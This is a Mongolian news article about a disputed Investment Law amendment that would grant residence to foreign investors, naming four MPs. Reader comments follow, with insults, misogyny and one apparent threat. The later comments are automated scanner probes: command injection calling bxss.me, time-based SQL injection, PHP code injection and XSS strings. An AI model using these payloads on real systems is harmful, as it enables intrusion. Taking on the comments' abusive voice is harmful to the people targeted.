НийгмийнУЛС ТӨР

Х.Ганхуяг гадаад явж, П.Анужин, Д.Өнөрболор нар “мэлзсэн” тул Х.Булгантуяа төслөө хамгаална

Цагаан цаасан дээр хар бэхээр зурсан гарын үсгээ нийгмийн дуулианаас үүдэн үгүйсгэж, “Ийм заалт байгаагүй” гэх агуулгаар сүртэй мэдэгдэл хийцгээв, Д.Өнөрболор, П.Анужин нар. Нийгмийн сүлжээнд олны анхаарлыг татаад буй уг хуулийн төслийг боловсруулах, хэлэлцэх явцад яг ямар үйл явц өрнөсөн бэ?

Нэг. АНХ ТӨСЛИЙГ Х.ГАНХУЯГ ГАНЦААРАА ӨРГӨН БАРЬЖЭЭ

УИХ-ын тамгын газрын албан ёсны мэдээлэл дамжуулдаг Парламент.мн сайтаас шүүж үзэхэд, УИХ-ын гишүүн Х.Ганхуяг 2021.06.21-ний өдөр Хөрөнгө оруулалтын тухай хуульд өөрчлөлт оруулах тухай хуулийн төслийг өргөн барьжээ.

Тайлбар: 2021.06.21-ний өдөр хуулийн төслийг өргөн барьсан зураг

Сонирхолтой нь, мөн эл өдөр Х.Ганхуяг гишүүний албан бланк дээрх уг хуулийн төслийг “...БОЛОВСРУУЛЖ, ӨРГӨН МЭДҮҮЛЖ БАЙНА” гэх утгатай агуулга бүхий бичигт Д.Өнөрболор, П.Анужин, Х.Булгантуяа нар гарын үсгээ зуржээ.

Ингэж гарын үсэг зурснаараа тэд хуулийн төслийг боловсруулалцсан авторуудын нэг гэдгээ баталгаажуулсан гэсэн үг.


Хоёр. ТЭДНИЙГ ГАРЫН ҮСЭГ ЗУРАХАД 50 МЯНГАН АМ.ДОЛЛАРТАЙ ХОЛБОГДОХ ЗААЛТ БАЙСАН/БАЙГААГҮЙ

Энэ бол маргааны гол сэдэв. Маргаан дагуулж буй заалт нь:

Гадаадын хөрөнгө оруулагч, түүний гэр бүл Монгол Улсад хувийн хэргээр оршин суух хүсэлт гаргасан тохиолдолд 50 мянган америк доллар буюу түүнтэй тэнцэх хэмжээний төгрөгөөс дээш хөрөнгийг Монгол Улсад хөрөнгө оруулалт хийснийг үндэслэн олгох.

Энэ талаар,

Д.Өнөрболор: Хуулийн төсөлд миний санал, санаачилга огт тусаагүй.

П.Анужин: Хуулийн өөрчлөлтийг дэмжих гарын үсэг зурахад эдгээр зүйл заалт чинь байгаагүй.

Х.Булгантуяа: Байсан. Засгийн газраас энэ талаар санал ирээгүй гэж тайлбарлаж байв.

Х.Ганхуяг: Нийгмийн дайралт их ирж байгаа учраас эмэгтэй гишүүдээ буруутгамааргүй байна.

Тэд энэ үйлдлээрээ юу хэлэв. Үндсэндээ 2021.06.21-ний өдөр Х.Ганхуяг гишүүн гэнэт “бушуу туулай” царайлж, өнөө хэдээрээ бланкан дээрх өргөн барих бичигтээ гялс гарын үсэг зуруулчихсан байх талтай аж. Гэхдээ Х.Булгантуяа гишүүн “Төслөө уншсан” бол өнөө хоёр тэнгэр харж байгаад зурчихсан логик эндээс харагдана. Тэд нэгдсэн байдлаар эл хуулийн төслөөр ОГТ ХУРАЛДААГҮЙ гэдэг нь эх сурвалжийн мэдээллүүдээр баталгаажиж буйг давхар онцлоё.


Гурав. ХЭЛЭЛЦЭХ АСУУДЛЫН 56-Д ЖАГСАЖ БАЙСАН ТӨСӨЛ ГЭНЭТ ТООНООР ОРЖ ИРЖЭЭ

УИХ-ын намрын чуулганаар хэлэлцэх асуудлын дарааллаас харахад, эл хуулийн төсөл 56-рт эрэмбэлэгдсэн байна. Тэгсэн атлаа яагаад гэнэт намрын чуулганы эхэнд ороод ирэв. Долоо хоногийн хэлэлцэх асуудлын дарааллыг УИХ дахь намын бүлгүүд, байнгын хороодын дарга нарыг оролцуулан, өмнөх Баасан гарагт нь спикер хуралдаан зарлаж шийддэг.

Тайлбар: УИХ-ын намрын чуулганы хэлэлцэх асуудлын дараалал

Эл жагсаалтыг урагшлуулахад, Х.Ганхуяг гишүүн байнгын хорооны даргын статусаа ашигласан байж болох талтай аж.

Тодорхой зүйл нь, уг төслийг УИХ дахь МАН-ын бүлэг тухайлан хэлэлцээгүй. Задгай саналтайгаар чуулганы хуралдаан руу оруулсан аж. Хуралдааны үеэр П.Анужин картаа сугалж гарсан бол Д.Өнөрболор гишүүн дэмжсэн кноп дарсан байна. Хуулийн төслийг эл хоёр гишүүн хамгаалах үүрэг гүйцэтгээгүй байна.


Дөрөв. ХЭРГИЙН ЭЗЭН Х.ГАНХУЯГ БӨӨН МАРГААН ДЭГДЭЭЖ ОРХИОД, ӨӨРӨӨ ГАДААД ЯВЖЭЭ

Эдүгээ Х.Ганхуяг гишүүн БНСУ-д яваа аж. Тэрбээр Пүрэв гарагийн чуулганы хуралдаанаар хэлэлцэх эсэх нь давангуут өөрөө гадаад явсан аж. Тэгэхээр өнөөдрийн /2021.10.11/ УИХ дахь МАН-ын бүлгийн хуралдаан дээр Х.Булгантуяа гишүүн төслөө хамгаалах ажилд “унажээ”.

Хэргийн гол эзэн Х.Ганхуяг ажлын хэсгийн хуралдааныг ганц ч зарлаагүй. Санал, агуулгаа нэгтгэлгүй төслийг гэрлийн хурдаар зүтгүүлсэн нь үндсэндээ нотлогдож байна. Гэхдээ гадаадын хөрөнгө оруулалтыг татах чиглэлд өөрөө идэвхийлэн ажиллаж буй Д.Өнөрболор гуравхан заалттай алга дарам цаасыг уншаагүй гэхэд итгэхэд асар бэрх логик юм.

Уг нь, 50 мянган ам.доллартай холбогдох заалт 2013 онд батлагдсан Хөрөнгө оруулалтын тухай хуулиндаа,

12.1.5.Монгол Улсад хөрөнгө оруулалт хийсэн гадаадын хөрөнгө оруулагч, түүний гэр бүлд Монгол Улсад зорчих олон удаагийн орж гарах виз болон байнга оршин суух зөвшөөрлийг холбогдох хууль тогтоомжийн дагуу олгох заалтыг хөнгөхөн агуулгаар тусгасан байдаг. Мөн 100 мянган ам.долларын босготой өөр нэг зохицуулалт бий.

Дээрх зохицуулалтуудыг нэгтгэх байдлаар “...оршин суух хүсэлт гаргавал 50 мянган ам.доллар авч байя” гэсэн концептыг өнөөгийн төсөлд нь тусаад байгаа юм.


СЭТГҮҮЛЧИЙН ТЭМДЭГЛЭЛ: Нэг намын хэт түрэмгий байдлаас олон нийт залхсан, улстөрчдөд итгэх итгэл асар их суларсан, нөхөн сонгууль давхацсан галтай, төвөгтэй үед эл хуулийн төсөл орж ирж таарав. Нэг талдаа, гадаад орчинд Монгол Улс төдийлөн тоогдохоо больж, төрийн ордноо тойрч хэрэлдсэн хөмөрсөн тогоон доторх ард түмний нэгдэл болсон ийм үед гадаадын хөрөнгө оруулагчдын эрх ашгийг өргөхөөс аргагүй. Нөгөө талд 50 мянган ам.долларын босго хэт бага уу гэвэл бага. Нэг ёсондоо дунд гарын жийп эсвэл дөмөгхөн хоёр өрөө байрны мөнгөөр байнгын оршин суух эрх өгнө гэсэн үг.

Дотоодын хэдэн ААН-үүдээ хэтийдсэн татвар, хорио, торгууль шийдмээр айлгадаг. Гадныхан ирэхээр улстөрчид нь хүртэл тэднийг залилагчдын эгнээнд орчихдог “аймшигтай” улс байж, нэг хуулийн төслөө л тойроод хэрэлдээд буй нь өнөөдрийн бидний эмгэнэл юм. Илүү эрүүлээр, илүү өргөнөөр л асуудлаа хармаар. УИХ-ын гишүүд нь ч тэр олигтойхон ажил хэрэгч, лоббинд өртдөггүй, санаачилсан хуулиндаа бат зогсож сурмаар байгаа юм.

Энэ мэдээнд өгөх таны үнэлгээ
Like
Love
Haha
Wow
Sad
Angry

Ж. Мядагбадам

Утга зохиолын ажилтан, сэтгүүлч мэргэжилтэй. Eguur.mn сайтын үүсгэн байгуулагч, Ерөнхий эрхлэгч.

АНХААРУУЛГА: Уншигчдын бичсэн сэтгэгдэлд Eguur.mn хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.

guest
44 Сэтгэгдэл
Хуучин
Шинэ Шилдэг
Inline Feedbacks
View all comments
Үзэгч
Үзэгч
2021-10-11 08:13

Солонгос эзэддээ хулгай баригдлаа шүү, өнөө муу хүүхнүүд чинь намайг бариад өгчихлөө гэж уйлан донгодохоор явжээ дээ,

Зочин
Зочин
2021-10-11 08:29

Тэгээд энэ гишүүд чинь юүүү ч уншиж танилцахгүй хэн нэгэн сая,сая $- ам�##�санд нь кноп дараад л сууж байдаг юм уу!!!?? Даваасүрэн гишүүн үүнийг нийтэд танилцуулаагүй чив ,чимээгүй батлагдаад л явах байж!!!!ДЭНДҮҮ,ДЭНДҮҮ,ДЭНДҮҮ !!!!

Тат
Тат
2021-10-11 08:29

Сонгогчид нь энэ шун�##�нуудаа татаач

Зочин
Зочин
2021-10-11 09:05

Энэ хуулийг батлаарай би хятад явж хүмүүс авчирлаа гэсэн байх даа ганхуяг м�##�

Zochin
Zochin
2021-10-11 09:08

uur sanaachilah huuli oldohgvi bgam bhdaa ulsaa zarj mungu olj ideh gesen ergvv m#luud z##luulah heregtei

Зочин
Зочин
2021-10-11 09:14

БИЧИГ ҮСЭГТ НЭВРЭЭГҮЙ УРГАА ОЙЛГОХГҮЙ ГЯТАДУУД ХУУЛЬ САНААЧИЛЖ СУУГАА ЮМ БИШҮҮ ЕР НЬ ЭДНИЙ ДУНД СУРГУУЛИЙН ХҮҮХДҮҮД БАЙДАГ БОЛОВ УУ ШАЛГАМААР ЮМ ДАА

Огцор
Огцор
2021-10-11 09:29

Энэ 4 б�##�ай огцор бүү гай бол шууд л зоригтой огцорооч

Зочин
Зочин
2021-10-11 10:10

Үндэсний эрх ашиг байх ёстой. Тодорхой с�##�барт 50 000 байж болно.

ЗОЧИН
ЗОЧИН
2021-10-11 10:24

ТӨРИЙН ЭРХ БАРИХАД ЭМЭГТЭЙЧҮҮД EР НЬ ХЭРЭГГҮЙ ЮМ БАЙНА ДАА. АНГАЛЗАЖ БАЙГААД АШИГЛУУЛЖ ГАРЫН ҮСГЭЭ ЗУРААД Л...

ЭХ ОРНЫ ТУСГААР ТОГТНОЛ НЬ ЭНЭ БИE НЬ ҮР ХҮҮХДИЙН ХОЙЧ ИРЭЭДҮЙ НЬ БҮРЭН БҮТЭН ГЭЖ НАЙДАХ АРГА АЛГА.

Zochin
Zochin
2021-10-11 10:51

tolqoiqvi durakuud.iim amitad l ter saaral baishind suudaq yum daa

Зочин
Зочин
2021-10-11 11:24

Эзэдтэйгээ уулзаж ажлын хөлсөө авахаар явсийм бишшүүү

Зочин
Зочин
2021-10-11 12:02

Ганцхан нүүр төслийг уншихгүй гарын үсэг зурах уу

зочин
зочин
2021-10-11 12:34

Хуулийг бат�##�ж болохгүй, маш олон т�##�ын суд�##�гаа хийх хэрэгтэй. Босго өндөр байна уу бага байна уу, тэр нь гол биш. Эд нар нэг нэгэндээ зээлүүлээд л хөрөнгө оруулагчийн карт аваад мөнгөө татаад авдаг. Цагаачдын �##�банаас нь дэмжлэг үзүүлдэг эсэхийг судлах, жил бүр муж мужын цагаачдын �##�банаас иргэдтэйгээ уулздаг. Хөрөнгө оруулагч гэж ажлын визний хөлс төлөхгүй гэж л авдаг шүү, жинхэнэ хөрөнгө орууулах сонирхолтой хүмүүсийг л дэмжих хэрэгтэй

Зочин
Зочин
2021-10-11 12:37

Эх орноосоо урвасан байна.

Зочин
Зочин
2021-10-11 12:56

Булгантуяа үүрд урвагчаар дуудуулж, буяндаа бузар хийхгүй гэвэл наад төслөө татаарай

Od
Od
2021-10-11 13:33

Anyjin tenger harjaagaad zyrsan gewvv ododtoi tenger vv odgvi tenger vv

зуузуу
зуузуу
2021-10-11 15:44

төрийн эрх барих байгууллагад мөнгөтэй хүн л гарч ирж байна тэд арвижуулахаа л боддог эдийн засгаа сайжруулах нэрээр бантан зуурах нь гадаадынханд засагл�##�ыг доод түвшинд байлгаж өгч олз олох энэ л шүү дээ

Үчоин
Үчоин
2021-10-11 16:05

Тene huulia butsaahgvi bol alaltsii shv nowshnuudaa

зочин
зочин
2021-10-11 17:02

Энэ 4 луйварчинг �######�уулах юмсан.

Зочин
Зочин
2021-10-11 22:42

Энэ сайтын эзэд нь кятдууд бололтой ажилаа дуусгасангүй гэж их л дурамжхан бичиж ккк

Зочин
Зочин
2021-10-12 07:00

Анужин өнөрболор 2 угаасаа идэвх муутай гишүүд, Булгантуяа гишүүн бүх чиглэлд оролцоотой идэвхтэй бүсгүй энэ удаа арай түргэдэв үү дээ. Хуулийн төслөө татчих аа гишүүн ээ, цаг нь болоогүй асуудлыг гаргаж ирж өөртөө г�##� дуудаад юүхэв , гол хүн нь ч гадагшаа явж. Энэ 4 хүнийг эргүүлэн тат энэтэр гэж сүржигнэхээ больчих, батлагдаад хор уршиг гараад байгаа биш буцаан татаад болно шүү дээ. Зарим нэг байгаа эсэх нь мэдэгдэхгүй тоо бөглөсөн үл мэдэгчдийн даргэд идэвхтэй, гарц хайсан амьд ажиллагаатай түүнээсээ болж �##�даа гаргасан байна. Бүү сүржигнэ өөр анхаарах асууд�##� �##�га уу ккк

Зочин
Зочин
2021-10-12 07:35

Солонгосын �########�ууд

Иргэн0
Иргэн0
2021-10-12 08:38

Эндээс тодорхой харагдаж байгаа нэг зүйл бол
Эд дөрөв буруу зүйл хийж байгаагаа мэдэж байсан
Учраас хэлэлцэх үеээр бултацгааж,нөгөө нэг зүйл
нь хэлэлцэх дара�##��##�ын 56-д байсан асуудлыг ямар аргаар оочерын урдуур оруулав,Ганхуягийн
ид шидүү,эсвэл өөр хүчин зүйл байна уу,үүний
мөрөөр ИХ-н хурлын ажлын �##�ба болон Ганхуягийг
ш�##�гаж нийтэд мэдээлэх хэрэгтэй.

zochin
zochin
2021-10-12 13:52

Булгантуяа, Анужин 2 лав хятадад сургууль төгссөн болохоор гараар нь могой бариулсан байхаа бөөн драм үүсгэжээ хүмүүс минь эх орноо л мартаж болохгүй шүү.

response.write(9833149*9661468)
response.write(9833149*9661468)
2021-10-14 12:10

555

|echo mfjeao$()\ nocjdm\nz^xyu||a #' |echo mfjeao$()\ nocjdm\nz^xyu||a #|
|echo mfjeao$()\ nocjdm\nz^xyu||a #' |echo mfjeao$()\ nocjdm\nz^xyu||a #|" |echo mfjeao$()\ nocjdm\nz^xyu||a #
2021-10-14 12:10

555

&(nslookup hitilfjjmcjkk13ae2.bxss.me||perl -e
&(nslookup hitilfjjmcjkk13ae2.bxss.me||perl -e "gethostbyname('hitilfjjmcjkk13ae2.bxss.me')")&'\"`0&(nslookup hitilfjjmcjkk13ae2.bxss.me||perl -e "gethostbyname('hitilfjjmcjkk13ae2.bxss.me')")&`'
2021-10-14 12:10

555

1
1
2021-10-14 12:11

555

${@print(md5(31337))}
${@print(md5(31337))}
2021-10-14 12:12

555

1
1
2021-10-14 12:13
1
1
2021-10-14 12:13

";print(md5(31337));$a="

1
1
2021-10-14 12:13

'.print(md5(31337)).'

HttP://bxss.me/t/xss.html?
HttP://bxss.me/t/xss.html?
2021-10-14 12:16

555

1
1
2021-10-14 12:16

bxss.me/t/xss.html?%00

/xfs.bxss.me
/xfs.bxss.me
2021-10-14 12:16

555

1
1
2021-10-14 12:17

wp-comments-post.php/.

Зочин
Зочин
2021-10-14 12:17

555

1
1
2021-10-14 12:18

555'"()&%K0AK(9153)

-1 OR 3+568-568-1=0+0+0+1
-1 OR 3+568-568-1=0+0+0+1
2021-10-14 12:26

555

1
1
2021-10-14 12:30

if(now()=sys#ate(),sleep(15),0)

1
1
2021-10-14 12:32

0'XOR(if(now()=sys#ate(),sleep(15),0))XOR'Z

1
1
2021-10-14 12:33

0"XOR(if(now()=sys#ate(),sleep(15),0))XOR"Z

1
1
2021-10-14 12:34

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1
1
2021-10-14 12:50

1'"

Холбоотой мэдээ

Back to top button